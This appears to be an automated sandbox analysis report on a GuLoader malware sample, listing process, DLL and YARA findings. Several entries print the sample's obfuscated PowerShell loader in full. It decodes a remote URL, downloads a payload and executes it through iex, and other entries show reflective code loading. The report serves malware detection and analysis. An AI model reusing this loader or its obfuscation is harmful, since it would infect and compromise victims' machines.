              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntvdm64.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2565659187.00000000076C0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000005.00000002.2565659187.00000000077AA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2565659187.000000000771D000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($W", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000005.00000002.2574516885.0000000009DEA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2573987215.0000000008B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2561974227.0000000005F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Stormfulde)$global:Skorpedes = [System.Text.Encoding]::ASCII.GetString($Shantung)$global:Lokalisering=$Skorpedes.substring($Swimsuit,$Differentialforstrker)<#Lardier Euskara Uninsist
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Germanerens197 $Fortepianoers $Anaptomorphidae), (Schriesheimite @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:vindicable = [AppDomain]::CurrentDomain.Ge
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Drummond)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Dialyserende, $false).DefineType($Slangeskindets
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Stormfulde)$global:Skorpedes = [System.Text.Encoding]::ASCII.GetString($Shantung)$global:Lokalisering=$Skorpedes.substring($Swimsuit,$Differentialforstrker)<#Lardier Euskara Uninsist
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasen
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasenJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasenJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F109B8 push E95ABCD0h; ret 2_2_00007FF848F109C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F100BD pushad ; iretd 2_2_00007FF848F100C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F16F87 push esp; retf 2_2_00007FF848F16F88
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07A808C2 push eax; mov dword ptr [esp], ecx5_2_07A80AC4
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
